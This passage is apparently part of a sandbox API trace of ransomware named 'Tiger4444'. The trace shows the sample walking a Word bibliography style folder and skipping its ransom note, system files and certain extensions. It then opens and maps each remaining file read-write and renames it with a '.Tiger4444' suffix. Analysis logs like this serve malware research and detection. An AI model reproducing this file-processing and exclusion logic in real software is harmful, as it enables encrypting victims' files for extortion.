returned 1 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0055.236] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14668924757) returned 1 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0055.236] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72258 | out: hHeap=0xc50000) returned 1 [0055.236] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.239] CloseHandle (hObject=0x2cc) returned 1 [0055.239] CloseHandle (hObject=0x2b8) returned 1 [0055.239] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.Tiger4444") returned 82 [0055.239] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\CHICAGO.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\chicago.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.240] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d81993, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2d81993, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x23a87e3, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x4197e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GB.XSL", cAlternateFileName="")) returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="Tiger4444.exe") returned -1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2=".") returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="..") returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="windows") returned -1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="bootmgr") returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="pagefile.sys") returned -1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="boot") returned 1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="ids.txt") returned -1 [0055.240] lstrcmpiW (lpString1="GB.XSL", lpString2="NTUSER.DAT") returned -1 [0055.240] lstrcpyW (in: lpString1=0x30aeb22, lpString2="GB.XSL" | out: lpString1="GB.XSL") returned="GB.XSL" [0055.240] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL", dwFileAttributes=0x0) returned 1 [0055.241] lstrlenW (lpString="GB.XSL") returned 6 [0055.241] lstrlenW (lpString="Tiger4444") returned 9 [0055.241] lstrcmpiW (lpString1="ꀀ", lpString2="Tiger4444") returned 1 [0055.241] lstrlenW (lpString=".dll") returned 4 [0055.241] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.241] lstrlenW (lpString=".lnk") returned 4 [0055.241] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.241] lstrlenW (lpString=".ini") returned 4 [0055.241] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.241] lstrlenW (lpString=".sys") returned 4 [0055.241] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.241] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.241] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.241] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14669458175) returned 1 [0055.242] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=268670) returned 1 [0055.242] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0055.242] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0055.242] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x41c80, lpName=0x0) returned 0x2cc [0055.243] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x41c80) returned 0xbe0000 [0055.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0055.264] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0055.265] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0055.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0055.265] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14671800903) returned 1 [0055.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0055.265] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0055.265] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.268] CloseHandle (hObject=0x2cc) returned 1 [0055.268] CloseHandle (hObject=0x2b8) returned 1 [0055.268] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.Tiger4444") returned 77 [0055.268] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GB.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gb.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.269] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da7ba7, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2da7ba7, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3e966, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GostName.XSL", cAlternateFileName="")) returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="Tiger4444.exe") returned -1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2=".") returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="..") returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="windows") returned -1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="bootmgr") returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="pagefile.sys") returned -1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="boot") returned 1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="ids.txt") returned -1 [0055.269] lstrcmpiW (lpString1="GostName.XSL", lpString2="NTUSER.DAT") returned -1 [0055.269] lstrcpyW (in: lpString1=0x30aeb22, lpString2="GostName.XSL" | out: lpString1="GostName.XSL") returned="GostName.XSL" [0055.269] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL", dwFileAttributes=0x0) returned 1 [0055.270] lstrlenW (lpString="GostName.XSL") returned 12 [0055.270] lstrlenW (lpString="Tiger4444") returned 9 [0055.271] lstrcmpiW (lpString1="tName.XSL", lpString2="Tiger4444") returned 1 [0055.271] lstrlenW (lpString=".dll") returned 4 [0055.271] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.271] lstrlenW (lpString=".lnk") returned 4 [0055.271] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.271] lstrlenW (lpString=".ini") returned 4 [0055.271] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.271] lstrlenW (lpString=".sys") returned 4 [0055.271] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.271] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.272] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.272] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14672487048) returned 1 [0055.272] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=256358) returned 1 [0055.272] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ab8 [0055.272] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0055.272] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ec70, lpName=0x0) returned 0x2cc [0055.273] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ec70) returned 0xbe0000 [0055.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0055.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0055.290] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0055.290] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0055.291] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14674367301) returned 1 [0055.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ab8 | out: hHeap=0xc50000) returned 1 [0055.291] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0055.291] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.293] CloseHandle (hObject=0x2cc) returned 1 [0055.293] CloseHandle (hObject=0x2b8) returned 1 [0055.293] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.Tiger4444") returned 83 [0055.293] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostName.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gostname.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.294] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da7ba7, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2da7ba7, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2120015, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3d639, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GostTitle.XSL", cAlternateFileName="GOSTTI~1.XSL")) returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="Tiger4444.exe") returned -1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2=".") returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="..") returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="windows") returned -1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="bootmgr") returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="pagefile.sys") returned -1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="boot") returned 1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="ids.txt") returned -1 [0055.294] lstrcmpiW (lpString1="GostTitle.XSL", lpString2="NTUSER.DAT") returned -1 [0055.294] lstrcpyW (in: lpString1=0x30aeb22, lpString2="GostTitle.XSL" | out: lpString1="GostTitle.XSL") returned="GostTitle.XSL" [0055.294] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL", dwFileAttributes=0x0) returned 1 [0055.294] lstrlenW (lpString="GostTitle.XSL") returned 13 [0055.294] lstrlenW (lpString="Tiger4444") returned 9 [0055.294] lstrcmpiW (lpString1="Title.XSL", lpString2="Tiger4444") returned 1 [0055.294] lstrlenW (lpString=".dll") returned 4 [0055.294] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.294] lstrlenW (lpString=".lnk") returned 4 [0055.294] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.294] lstrlenW (lpString=".ini") returned 4 [0055.294] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.294] lstrlenW (lpString=".sys") returned 4 [0055.294] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.294] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.295] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.295] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14674775047) returned 1 [0055.295] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=251449) returned 1 [0055.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0055.295] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0055.295] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d940, lpName=0x0) returned 0x2cc [0055.296] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d940) returned 0xbe0000 [0055.312] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.312] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0055.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0055.313] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14676603534) returned 1 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0055.313] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0055.313] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.315] CloseHandle (hObject=0x2cc) returned 1 [0055.316] CloseHandle (hObject=0x2b8) returned 1 [0055.316] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.Tiger4444") returned 84 [0055.316] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\GostTitle.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\gosttitle.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.317] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2df40d1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2df40d1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2788516, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x45882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HarvardAnglia2008OfficeOnline.xsl", cAlternateFileName="HARVAR~1.XSL")) returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="Tiger4444.exe") returned -1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2=".") returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="..") returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="windows") returned -1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="bootmgr") returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="boot") returned 1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="ids.txt") returned -1 [0055.317] lstrcmpiW (lpString1="HarvardAnglia2008OfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0055.317] lstrcpyW (in: lpString1=0x30aeb22, lpString2="HarvardAnglia2008OfficeOnline.xsl" | out: lpString1="HarvardAnglia2008OfficeOnline.xsl") returned="HarvardAnglia2008OfficeOnline.xsl" [0055.317] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0055.317] lstrlenW (lpString="HarvardAnglia2008OfficeOnline.xsl") returned 33 [0055.317] lstrlenW (lpString="Tiger4444") returned 9 [0055.317] lstrcmpiW (lpString1="nline.xsl", lpString2="Tiger4444") returned -1 [0055.317] lstrlenW (lpString=".dll") returned 4 [0055.317] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0055.317] lstrlenW (lpString=".lnk") returned 4 [0055.317] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0055.317] lstrlenW (lpString=".ini") returned 4 [0055.317] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0055.317] lstrlenW (lpString=".sys") returned 4 [0055.317] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0055.318] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.318] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.318] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14677092902) returned 1 [0055.318] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=284802) returned 1 [0055.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0055.318] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d90 [0055.318] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x45b90, lpName=0x0) returned 0x2cc [0055.319] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x45b90) returned 0xbe0000 [0055.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0055.339] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0055.339] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0055.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0055.340] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14679293683) returned 1 [0055.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0055.340] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d90 | out: hHeap=0xc50000) returned 1 [0055.340] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.342] CloseHandle (hObject=0x2cc) returned 1 [0055.342] CloseHandle (hObject=0x2b8) returned 1 [0055.342] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.Tiger4444") returned 104 [0055.343] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\HarvardAnglia2008OfficeOnline.xsl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\harvardanglia2008officeonline.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.343] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2cbf800, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x47e7d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IEEE2006OfficeOnline.xsl", cAlternateFileName="IEEE20~1.XSL")) returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="Tiger4444.exe") returned -1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2=".") returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="..") returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="windows") returned -1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="bootmgr") returned 1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0055.343] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", 